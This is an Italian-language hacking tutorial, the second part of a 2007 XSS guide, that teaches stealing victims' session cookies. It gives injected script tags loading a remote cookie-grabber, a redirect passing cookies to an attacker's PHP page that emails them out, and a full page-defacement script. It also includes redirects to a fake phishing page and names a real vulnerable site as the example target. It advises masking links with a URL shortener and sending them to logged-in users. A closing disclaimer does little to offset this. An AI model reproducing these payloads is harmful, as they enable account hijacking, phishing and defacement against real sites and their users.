Guida XSS - 2a Parte
-------------------------------
Autore: Langy
Data: 11-09-2007
Copyright: http://www.googlebig.com
-------------------------------
Link utili:
http://www.gnucitizen.org/xssdb/application.htm (Attack Database)
http://www.xssed.com (Mirror Archive of Vulnerable Websites)
http://ha.ckers.org/xss.html (XSS Cheat sheet)
http://software.graflex.org/dexss/ (Removing JavaScript from HTML)
http://en.wikipedia.org/wiki/Cross-site_scripting
-------------------------------
A questo punto ci serve sapere i cookie della vittima e quindi entra in gioco un cookie grabber che altro non è che uno script che risiedera' sul nostro server e che includeremo nell'url del sito vulnerabile per farci inviare i cookie direttamente dalla vittima :D
Per includere un file con javascript possiamo scrivere così
"><script src="http://www.googlebig.com/cookiescript.js"></script>
All'interno del file cookiescript.js ci scriveremo in codice che visualizza il cookie e ce lo invia per email.
Come prima cosa bisogna creare un redirect verso il nostro sito includendo la variabile del cookie.
quindi:
<script>location.href="http://googlebig.com/cookie.php?cookie=</script>
Ora creiamo il file cookie.php
<? mail("admin@googlebig.com","Ecco il cookie rubato",$_GET['cookie']; ?>
Uppiamo il file cookie.php e cookiescript.js sul nostro server e poi facciamo una prova andando sull'indirizzo:
http://www.seap-puglia.it/default.asp?rif=1&tiporicerca=2&strRicerca
1="><scriptsrc="http://www.googlebig.com/cookiescript.js"></script>
Se tutto funziona vedremo arrivarci un'email con il nostro cookie.
Mandiamo il link alla vittima.. possiamo o mandare il link per esteso oppure utilizzare un servizio di redirect come http://www.tinyurl.com
Una volta creato il redirect, in questo caso http://tinyurl.com/2rgry5 possiamo contattare l'utente, possibilmente tramite il sito stesso per essere sicuri che apra il link quando è effettivamente loggato al sito.
XSS CHE NON FUNZIONA
Se una xss non funziona e quindi non da la possibilita' di un redirect o non visualizza i cookie puo' essere utilizzata come pagina di phishing. Tutto sta sempre nel creare un file .js da includere alla pagina.
Un esempio di codice è questo:
var title = "XSSED BY GOOGLEBIG.COM";var bgcolor = "#000000";
var image_url = "http://www.googlebig.com/googlebig.jpg";
var text = "Langy was here ;)";var font_color = "#FFFFFF";
deface(title, bgcolor, image_url, text, font_color);
function deface(pageTitle, bgColor, imageUrl, pageText, fontColor)
{ document.title = pageTitle;
document.body.innerHTML = '';
document.bgColor = bgColor;
var overLay = document.createElement("div");
overLay.style.textAlign = 'center';
document.body.appendChild(overLay);
var txt = document.createElement("p");
txt.style.font = 'normal normal bold 36px Verdana';
txt.style.color = fontColor; txt.innerHTML = pageText;
overLay.appendChild(txt);
if (image_url != "") { var newImg = document.createElement("img");
newImg.setAttribute("border", '0');
newImg.setAttribute("src", imageUrl);
overLay.appendChild(newImg); }
var footer = document.createElement("p");
footer.style.font = 'italic normal normal 12px Arial';
footer.style.color = '#DDDDDD'; footer.innerHTML = title;
overLay.appendChild(footer);}
Questo codice va inserito in questo modo:
http://[sitovittima]/pagina.php?variabile="><script src="http://www.googlebig.com/script.js"></script>
In questo modo andando su quell'indirizzo vedremo quella pagina in javascript che abbiamo creato... Ovviamente a buon intenditor poche parole.
Anche in questo caso ci possiamo avvalere di tinyurl per mascherare il nostro url completo e quindi includere direttamente il redirect
http://[sitovittima]/pagina.php?variabile="><script src="http://tinyurl.com/xxxxx"></script>
Un altro metodo per portare la vittima sulla pagina che desideriamo è questo:
http://[sitovittima]/pagina.php?variabile="><script>
location.href="http://www.googlebig.com/fakepage.htm</script>
Questa guida è stata creata per puro scopo informativo. Non fate i lameri -.-
La prima cosa da fare quando ne trovate una è postarla qui http://www.xssed.com/submit e poi contattare il webmaster del sito vulnerabile a xss segnalandogli il problema.
La seguente guida puo' essere utilizzata liberamente su qualsiasi sito includendo senza modifiche il copyright.
Vai alla 3a Parte della Guida
